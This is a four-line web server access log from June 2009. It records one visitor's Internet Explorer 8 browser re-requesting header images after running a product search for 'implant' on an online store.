82.155.69.58 - - [22/Jun/2009:05:44:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:44:33 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:44:36 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
82.155.69.58 - - [22/Jun/2009:05:44:36 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implant" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
